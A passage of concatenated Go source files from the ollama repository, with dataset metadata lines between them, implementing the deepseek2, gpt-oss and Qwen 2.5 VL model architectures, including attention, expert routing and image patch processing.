qkRopeHeadDim: int(c.Uint("rope.dimension_count")), qkNopeHeadDim: keyLength - int(c.Uint("rope.dimension_count")), kqNopeHeadDim: keyLength - 
int(c.Uint("rope.dimension_count")), routedScalingFactor: c.Float("expert_weights_scale"), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), kqScale: kqScale, }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } func (m Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates), nil } func init() { model.Register("deepseek2", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gptoss/model.go
model/models/gptoss/model.go
package gptoss import ( "cmp" "math" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Transformer struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` TransformerBlocks []TransformerBlock `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } // Forward implements model.Model. func (m *Transformer) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) for i, block := range m.TransformerBlocks { m.Cache.SetLayer(i) if c, ok := m.Cache.(*kvcache.WrapperCache); ok { // Even layers are sliding window attention. c.SetLayerType(i % 2) } var outputs ml.Tensor if i == len(m.TransformerBlocks)-1 { outputs = batch.Outputs } hiddenStates = block.Forward(ctx, hiddenStates, positions, outputs, m.Cache, &m.Options) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates), nil } func (m *Transformer) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type Options struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength, numExperts, numExpertsUsed, originalContextLength int eps, ropeBase, ropeScale float32 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1./o.ropeScale, rope.WithTypeNeoX(), rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(1.), // NOTE: ggml sets this implicitly so there's no need to set it here // 
rope.WithAttentionFactor(0.1*float32(math.Log(float64(o.ropeScale))) + 1.0), ) } func (o Options) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } type TransformerBlock struct { Attention *AttentionBlock MLP *MLPBlock } func (d *TransformerBlock) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) } hiddenStates = d.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates } type AttentionBlock struct { Norm *nn.RMSNorm `gguf:"attn_norm"` QKV *nn.Linear `gguf:"attn_qkv"` Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_out,alt:attn_output"` Sinks ml.Tensor `gguf:"attn_sinks,alt:attn_sinks.weight"` } func (attn *AttentionBlock) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) residual := hiddenStates hiddenStates = attn.Norm.Forward(ctx, hiddenStates, opts.eps) var query, key, value ml.Tensor if attn.QKV != nil { qkv := attn.QKV.Forward(ctx, hiddenStates) qkv = qkv.Reshape(ctx, opts.headDim(), -1, batchSize) chunks := qkv.ChunkSections(ctx, 1, opts.numHeads, opts.numKVHeads, opts.numKVHeads) query, key, value = chunks[0], chunks[1], chunks[2] } else { query = attn.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key = attn.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = attn.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) } query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.AttentionWithSinks(ctx, query, 
key, value, attn.Sinks, 1/math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return attn.Output.Forward(ctx, attention).Add(ctx, residual) } type MLPBlock struct { Norm *nn.RMSNorm `gguf:"ffn_norm,alt:post_attention_norm"` Router *nn.Linear `gguf:"ffn_gate_inp"` GateUp *nn.LinearBatch `gguf:"ffn_gate_up_exps"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (mlp *MLPBlock) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) residual := hiddenStates hiddenStates = mlp.Norm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routingWeights := mlp.Router.Forward(ctx, hiddenStates) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, sequenceLength*batchSize).Rows(ctx, selectedExperts) routingWeights = routingWeights.Reshape(ctx, opts.numExpertsUsed, sequenceLength*batchSize).Softmax(ctx) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExpertsUsed, sequenceLength*batchSize) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) var gate, up ml.Tensor if mlp.GateUp != nil { hiddenStates = mlp.GateUp.Forward(ctx, hiddenStates, selectedExperts) gate = hiddenStates.Slice(ctx, 0, 0, hiddenStates.Dim(0), 2) up = hiddenStates.Slice(ctx, 0, 1, hiddenStates.Dim(0), 2) } else { gate = mlp.Gate.Forward(ctx, hiddenStates, selectedExperts) up = mlp.Up.Forward(ctx, hiddenStates, selectedExperts) } hiddenStates = gate.SILUAlphaLimit(ctx, up, 1.702, 7) experts := mlp.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), 
experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates.Add(ctx, residual) } func New(c fs.Config) (model.Model, error) { m := Transformer{ TransformerBlocks: make([]TransformerBlock, c.Uint("block_count")), BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, strings.Join([]string{ `[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]*[\p{Ll}\p{Lm}\p{Lo}\p{M}]+(?i:'s|'t|'re|'ve|'m|'ll|'d)?`, `[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]+[\p{Ll}\p{Lm}\p{Lo}\p{M}]*(?i:'s|'t|'re|'ve|'m|'ll|'d)?`, `\p{N}{1,3}`, ` ?[^\s\p{L}\p{N}]+[\r\n/]*`, `\s*[\r\n]+`, `\s+(?!\S)`, `\s+`, }, "|"), ), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1.), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), }, } m.Cache = kvcache.NewWrapperCache( kvcache.NewSWAMemCache(int32(c.Uint("attention.sliding_window")), 4096, m.Shift), kvcache.NewCausalCache(m.Shift), ) return &m, nil } func init() { model.Register("gptoss", New) model.Register("gpt-oss", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/process_image.go
model/models/qwen25vl/process_image.go
package qwen25vl import ( "fmt" "image" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) // ImageProcessor contains configuration for the Qwen 2.5 VL image processing type ImageProcessor struct { numChannels int patchSize int temporalPatchSize int mergeSize int minPixels int maxPixels int factor int rescaleFactor float32 imageMean [3]float32 imageStd [3]float32 } // newImageProcessor creates a new image processor with default values func newImageProcessor(c fs.Config) ImageProcessor { patchSize := int(c.Uint("vision.patch_size", 14)) mergeSize := int(c.Uint("vision.spatial_merge_size", 2)) return ImageProcessor{ numChannels: int(c.Uint("vision.num_channels", 3)), // not set patchSize: patchSize, temporalPatchSize: 2, mergeSize: mergeSize, minPixels: 56 * 56, maxPixels: int(c.Uint("vision.max_pixels", 2<<20)), // 2M limit factor: patchSize * mergeSize, rescaleFactor: 1.0 / 255.0, imageMean: imageproc.ClipDefaultMean, imageStd: imageproc.ClipDefaultSTD, } } // SmartResize implements the smart resize algorithm func (p *ImageProcessor) SmartResize(height, width int) (int, int) { factor := p.factor if height < factor || width < factor { panic(fmt.Sprintf("height:%d or width:%d must be larger than factor:%d", height, width, factor)) } else if aspectRatio := max(height, width) / min(height, width); aspectRatio > 200 { panic(fmt.Sprintf("absolute aspect ratio must be smaller than 200, got %v", aspectRatio)) } round := func(x float64) int { return int(math.RoundToEven(x)) } hBar := round(float64(height)/float64(factor)) * factor wBar := round(float64(width)/float64(factor)) * factor if hBar*wBar > p.maxPixels { beta := math.Sqrt(float64(height*width) / float64(p.maxPixels)) hBar = int(math.Floor(float64(height)/beta/float64(factor))) * factor wBar = int(math.Floor(float64(width)/beta/float64(factor))) * factor } else if hBar*wBar < p.minPixels { beta := math.Sqrt(float64(p.minPixels) / float64(height*width)) hBar = 
int(math.Ceil(float64(height)*beta/float64(factor))) * factor wBar = int(math.Ceil(float64(width)*beta/float64(factor))) * factor } return hBar, wBar } type Grid struct { Height int Width int Temporal int } func (p *ImageProcessor) ProcessImage(img image.Image) ([]float32, *Grid, error) { img = imageproc.Composite(img) origWidth := img.Bounds().Dx() origHeight := img.Bounds().Dy() // Calculate smart resize dimensions resizedHeight, resizedWidth := p.SmartResize(origHeight, origWidth) // Resize image using existing functions resizedImg := imageproc.Resize(img, image.Point{X: resizedWidth, Y: resizedHeight}, imageproc.ResizeBilinear) normalizedPixels := imageproc.Normalize(resizedImg, p.imageMean, p.imageStd, true, true) // Calculate grid dimensions grid := &Grid{ Height: resizedHeight / p.patchSize, Width: resizedWidth / p.patchSize, Temporal: 1, // For single images, temporal dimension is 1 } patches, err := p.createPatches(normalizedPixels, resizedHeight, resizedWidth, grid) if err != nil { return nil, nil, fmt.Errorf("failed to create patches: %v", err) } // Return patches and grid dimensions return patches, grid, nil } func (p *ImageProcessor) createPatches(pixels []float32, height, width int, grid *Grid) ([]float32, error) { channels := p.numChannels patchSize := p.patchSize mergeSize := p.mergeSize temporalPatchSize := p.temporalPatchSize // Calculate output dimensions numPatches := grid.Temporal * grid.Height * grid.Width patchDim := channels * temporalPatchSize * patchSize * patchSize result := make([]float32, numPatches*patchDim) patchIndex := 0 // Single temporal frame handling (copies to all frames) for range grid.Temporal { for h := 0; h < grid.Height; h += mergeSize { for w := 0; w < grid.Width; w += mergeSize { // Handle the 2x2 merged patches for mh := range mergeSize { for mw := range mergeSize { baseOffset := patchIndex * patchDim // Extract patch data for first temporal frame for c := range channels { channelOffset := baseOffset + (c * 
temporalPatchSize * patchSize * patchSize) for py := range patchSize { for px := range patchSize { // Calculate source pixel coordinates y := (h+mh)*patchSize + py x := (w+mw)*patchSize + px // Source index in input tensor (CHW format) srcIdx := c*height*width + y*width + x // Destination index in first temporal frame dstIdx := channelOffset + (py * patchSize) + px if srcIdx < len(pixels) && dstIdx < len(result) { result[dstIdx] = pixels[srcIdx] } } } } // Copy first temporal frame to all other frames if temporalPatchSize > 1 { for c := range channels { channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize) firstFrameOffset := channelOffset frameSize := patchSize * patchSize // Copy first frame to all other frames for tp := 1; tp < temporalPatchSize; tp++ { currentFrameOffset := channelOffset + (tp * frameSize) copy(result[currentFrameOffset:currentFrameOffset+frameSize], result[firstFrameOffset:firstFrameOffset+frameSize]) } } } patchIndex++ } } } } } return result, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/model.go
model/models/qwen25vl/model.go
package qwen25vl import ( "bytes" "image" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.BytePairEncoding *TextModel *VisionModel `gguf:"v"` ImageProcessor } // Implement MultimodalProcessor interface var _ model.MultimodalProcessor = (*Model)(nil) func New(c fs.Config) (model.Model, error) { m := &Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), TextModel: NewTextModel(c), VisionModel: newVisionModel(c), ImageProcessor: newImageProcessor(c), } m.Cache = kvcache.NewCausalCache(m.TextModel.Shift) return m, nil } func (m *Model) PixelValues(ctx ml.Context, multimodalData []byte) (ml.Tensor, *Grid, error) { img, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, nil, err } f32s, grid, err := m.ImageProcessor.ProcessImage(img) if err != nil { return nil, nil, err } // Calculate tensor dimensions patchDim := m.numChannels * m.temporalPatchSize * m.patchSize * m.patchSize numPatches := grid.Temporal * grid.Height * grid.Width pixelValues := ctx.Input().FromFloats(f32s, patchDim, numPatches) return pixelValues, grid, nil } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) == 0 { return nil, model.ErrNoVisionModel } pixels, grid, err := 
m.PixelValues(ctx, multimodalData) if err != nil { return nil, err } visionOutputs := m.VisionModel.Forward(ctx, pixels, grid) return []input.Multimodal{{Tensor: visionOutputs, Data: grid}}, nil } // PostTokenize arranges Qwen-2.5-VL's inputs for the forward pass func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { // Reset position cache m.positionCache = m.positionCache[:0] var result []*input.Input var ( imageToken int32 = 151655 visionStartToken int32 = 151652 visionEndToken int32 = 151653 ) appendInput := func(i *input.Input, p int) int { result = append(result, i) m.positionCache = append(m.positionCache, int32(p)) return p + 1 } var p int for _, inp := range inputs { if inp.Multimodal == nil { // If not a multimodal input, add it to the result unchanged p = appendInput(inp, p) } else { // First add the vision start token p = appendInput(&input.Input{Token: visionStartToken}, p) // Add the image token with the multimodal tensor data at the first position tokensPerGrid := inp.Multimodal[0].Tensor.Dim(1) appendInput(&input.Input{ Token: imageToken, Multimodal: inp.Multimodal, MultimodalHash: inp.MultimodalHash, SameBatch: tokensPerGrid, }, p) // Add the placeholder tokens for the remaining positions (tokensPerGrid-1) for range tokensPerGrid - 1 { appendInput(&input.Input{Token: imageToken}, p) } grid := inp.Multimodal[0].Data.(*Grid) p = appendInput(&input.Input{Token: visionEndToken}, p+max(grid.Width/m.spatialMergeSize, grid.Height/m.spatialMergeSize)) } } return result, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { // Initial token embedding hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs).Duplicate(ctx) positionSlice := func() [][]int32 { s := [][]int32{ make([]int32, len(batch.Positions)), make([]int32, len(batch.Positions)), make([]int32, len(batch.Positions)), make([]int32, len(batch.Positions)), } for i, position := range batch.Positions { if position < 
int32(len(m.positionCache)) { position = m.positionCache[position] } else if len(m.positionCache) > 0 { position = position - int32(len(m.positionCache)) + m.positionCache[len(m.positionCache)-1] + 1 } s[0][i] = position s[1][i] = position s[2][i] = position } return s }() for _, mi := range batch.Multimodal { img := mi.Multimodal[0].Tensor ctx.Forward(img.Copy(ctx, hiddenStates.View(ctx, mi.Index*hiddenStates.Stride(1), img.Dim(0)*img.Dim(1)))) if grid, ok := mi.Multimodal[0].Data.(*Grid); ok { for i := range img.Dim(1) { w := grid.Width / m.spatialMergeSize positionSlice[1][mi.Index+i] += int32(i / w) positionSlice[2][mi.Index+i] += int32(i % w) } } } positions := ctx.Input().FromInts(slices.Concat(positionSlice...), len(positionSlice[0])*len(positionSlice)) // Process through transformer layers for i, layer := range m.TextModel.Layers { m.Cache.SetLayer(i) var lastLayerOutputs ml.Tensor if i == len(m.TextModel.Layers)-1 { lastLayerOutputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, lastLayerOutputs, m.Cache, m.TextOptions) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.TextModel.eps) return m.Output.Forward(ctx, hiddenStates), nil } func init() { model.Register("qwen25vl", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/model_vision.go
model/models/qwen25vl/model_vision.go
package qwen25vl

import (
	"math"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/ml/nn/rope"
)

// blockDiagonalMask builds a seqLength x seqLength additive attention mask
// that is 0 within each [bounds[i-1], bounds[i]) window and -Inf elsewhere,
// restricting attention to tokens in the same window.
func blockDiagonalMask(ctx ml.Context, seqLength int, bounds []int) ml.Tensor {
	// Initialize a 2D mask with -Inf
	s := make([][]float32, seqLength)
	for i := range s {
		s[i] = slices.Repeat([]float32{float32(math.Inf(-1))}, seqLength)
	}

	// Fill in the mask with zeros for tokens that CAN attend to each other
	for i := 1; i < len(bounds); i++ {
		start, end := bounds[i-1], bounds[i]
		// Enable attention within this sequence block
		for row := start; row < end; row++ {
			for col := start; col < end; col++ {
				s[row][col] = 0.0
			}
		}
	}

	return ctx.Input().FromFloats(slices.Concat(s...), seqLength, seqLength)
}

// VisionSelfAttention holds the QKV and output projections of one vision
// encoder block.
type VisionSelfAttention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_out"`
}

// Forward computes multi-head self-attention with 2D rotary embeddings and an
// optional additive mask (nil for full attention).
func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenStates, positions, mask ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	query := sa.Query.Forward(ctx, hiddenStates)
	key := sa.Key.Forward(ctx, hiddenStates)
	value := sa.Value.Forward(ctx, hiddenStates)

	query = query.Reshape(ctx, opts.headDim, opts.numHeads, query.Dim(1))
	key = key.Reshape(ctx, opts.headDim, opts.numHeads, key.Dim(1))
	value = value.Reshape(ctx, opts.headDim, opts.numHeads, value.Dim(1))

	query = opts.applyRotaryPositionEmbeddings(ctx, query, positions)
	key = opts.applyRotaryPositionEmbeddings(ctx, key, positions)

	// Scale factor for scaled dot-product attention
	scale := 1.0 / math.Sqrt(float64(opts.headDim))

	// Scaled dot-product attention, computed explicitly so the mask can be
	// added between the QK^T product and the softmax.
	query = query.Permute(ctx, 0, 2, 1, 3)
	key = key.Permute(ctx, 0, 2, 1, 3)
	value = value.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx)

	kq := key.MulmatFullPrec(ctx, query)
	kq = kq.Scale(ctx, scale)
	if mask != nil {
		kq = kq.Add(ctx, mask)
	}
	kq = kq.Softmax(ctx)
	kqv := value.Mulmat(ctx, kq)
	attention := kqv.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)
	attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2))

	return sa.Output.Forward(ctx, attention)
}

// VisionMLP implements the multi-layer perceptron (SwiGLU feed-forward).
type VisionMLP struct {
	Gate *nn.Linear `gguf:"ffn_gate"`
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
}

// Forward applies gate*silu ∘ up followed by the down projection.
func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates))
	return mlp.Down.Forward(ctx, hiddenStates)
}

// VisionEncoderLayer is one pre-norm transformer block of the vision encoder.
type VisionEncoderLayer struct {
	Norm1         *nn.RMSNorm `gguf:"ln1"`
	SelfAttention *VisionSelfAttention
	Norm2         *nn.RMSNorm `gguf:"ln2"`
	MLP           *VisionMLP
}

// Forward applies norm → attention → residual, then norm → MLP → residual.
func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenStates, positions, mask ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	residual := hiddenStates
	hiddenStates = e.Norm1.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = e.SelfAttention.Forward(ctx, hiddenStates, positions, mask, opts)
	hiddenStates = hiddenStates.Add(ctx, residual)

	residual = hiddenStates
	hiddenStates = e.Norm2.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts)
	return hiddenStates.Add(ctx, residual)
}

// VisionModelOptions contains configuration options
type VisionModelOptions struct {
	hiddenSize        int
	numHeads          int
	headDim           int
	patchSize         int
	numChannels       int
	eps               float32
	ropeTheta         float32
	spatialMergeSize  int
	windowSize        int
	fullAttnBlocks    []int32
	temporalPatchSize int
}

// applyRotaryPositionEmbeddings applies 2D vision RoPE: the head dimension is
// split into four equal sections (height/width interleaved pairs).
func (o VisionModelOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor {
	return nn.RoPE(ctx, states, positions, o.headDim/2, o.ropeTheta, 1,
		rope.WithVision([]int{
			o.headDim / 4, o.headDim / 4,
			o.headDim / 4, o.headDim / 4,
		}),
	)
}

// PatchEmbedding holds the two temporal convolutions that embed image patches.
type PatchEmbedding struct {
	PatchConv0 *nn.Conv2D `gguf:"patch_embd_0"`
	PatchConv1 *nn.Conv2D `gguf:"patch_embd_1"`
}

// Forward embeds pixel patches: the two temporal frames are convolved
// separately (one conv per frame) and summed — equivalent to a 3D conv with
// temporal kernel size 2.
func (pe *PatchEmbedding) Forward(ctx ml.Context, pixelValues ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	numPatches := pixelValues.Shape()[1]

	// Reshape the input tensor to match the expected dimensions
	pixelValues = pixelValues.Reshape(ctx, opts.patchSize*opts.patchSize, opts.temporalPatchSize, opts.numChannels, numPatches)
	// Permute the tensor to bring the temporal dimension to the front
	pixelValues = pixelValues.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx)

	// Split the tensor into per-frame views for the temporal convolutions
	in0 := pixelValues.View(ctx, 0, 1, pixelValues.Stride(1), pixelValues.Dim(1), pixelValues.Stride(2), pixelValues.Dim(2), pixelValues.Stride(3), pixelValues.Dim(3)).Contiguous(ctx)
	in0 = in0.Reshape(ctx, opts.patchSize, opts.patchSize, opts.numChannels, numPatches)
	in1 := pixelValues.View(ctx, pixelValues.Stride(0), 1, pixelValues.Stride(1), pixelValues.Dim(1), pixelValues.Stride(2), pixelValues.Dim(2), pixelValues.Stride(3), pixelValues.Dim(3)).Contiguous(ctx)
	in1 = in1.Reshape(ctx, opts.patchSize, opts.patchSize, opts.numChannels, numPatches)

	s0, s1 := opts.patchSize, opts.patchSize // stride == kernel: non-overlapping patches
	p0, p1 := 0, 0                           // padding
	d0, d1 := 1, 1                           // dilation
	out0 := pe.PatchConv0.Forward(ctx, in0, s0, s1, p0, p1, d0, d1)
	out1 := pe.PatchConv1.Forward(ctx, in1, s0, s1, p0, p1, d0, d1)

	// Add the outputs from the two temporal convolutions
	out := out0.Add(ctx, out1)

	// Reshape the output tensor to match the expected dimensions
	return out.Reshape(ctx, opts.hiddenSize, numPatches)
}

// VisionPatchMerger implements patch merging for the Qwen vision model
type VisionPatchMerger struct {
	LNQ  *nn.RMSNorm `gguf:"ln_q"`
	MLP0 *nn.Linear  `gguf:"mlp.0"`
	MLP2 *nn.Linear  `gguf:"mlp.2"`
}

// Forward merges each spatialMergeSize² group of patches into one token via
// norm → reshape → MLP0 → GELU → MLP2.
func (pm *VisionPatchMerger) Forward(ctx ml.Context, visionOutputs ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	normalized := pm.LNQ.Forward(ctx, visionOutputs, opts.eps)
	hiddenSize := visionOutputs.Dim(0) * (opts.spatialMergeSize * opts.spatialMergeSize)

	// Fold each merge group into the hidden dimension
	reshaped := normalized.Reshape(ctx, hiddenSize, normalized.Dim(1)/(opts.spatialMergeSize*opts.spatialMergeSize))
	hidden := pm.MLP0.Forward(ctx, reshaped)
	activated := hidden.GELU(ctx)
	return pm.MLP2.Forward(ctx, activated)
}

// VisionModel implements the Qwen vision model
type VisionModel struct {
	PatchEmbedding *PatchEmbedding
	Layers         []VisionEncoderLayer `gguf:"blk"`
	PatchMerger    *VisionPatchMerger   `gguf:"merger"`

	*VisionModelOptions
}

// Forward computes the vision model for an input tensor. Patches are permuted
// into window order, run through the encoder (window attention everywhere
// except the blocks listed in fullAttnBlocks), merged, and permuted back.
func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor, grid *Grid) ml.Tensor {
	// Extract patch embeddings
	hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.VisionModelOptions)

	index, bounds := m.windowIndex(grid)
	spatialMergeUnit := m.spatialMergeSize * m.spatialMergeSize

	// Reorder patches into window order (argsort of the window index) while
	// keeping each merge group contiguous.
	windowIndex := ctx.Input().FromInts(index, len(index))
	hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0)*spatialMergeUnit, hiddenStates.Dim(1)/spatialMergeUnit)
	hiddenStates = hiddenStates.Rows(ctx, windowIndex.Argsort(ctx))
	hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0)/spatialMergeUnit, hiddenStates.Dim(1)*spatialMergeUnit)

	// Per-patch (y, x) coordinates for 2D RoPE, stored in window order to
	// match the permuted hiddenStates.
	positions := ctx.Input().FromInts(func() []int32 {
		s := [][]int32{
			make([]int32, grid.Height*grid.Width),
			make([]int32, grid.Height*grid.Width),
			make([]int32, grid.Height*grid.Width),
			make([]int32, grid.Height*grid.Width),
		}

		var cur int
		for y := 0; y < grid.Height; y += m.spatialMergeSize {
			for x := 0; x < grid.Width; x += m.spatialMergeSize {
				// Iterate the merge group; the index arithmetic below assumes
				// exactly spatialMergeUnit entries per group.
				for dy := range m.spatialMergeSize {
					for dx := range m.spatialMergeSize {
						i := int(index[cur/spatialMergeUnit]) * spatialMergeUnit
						i += cur % spatialMergeUnit

						s[0][i] = int32(y + dy)
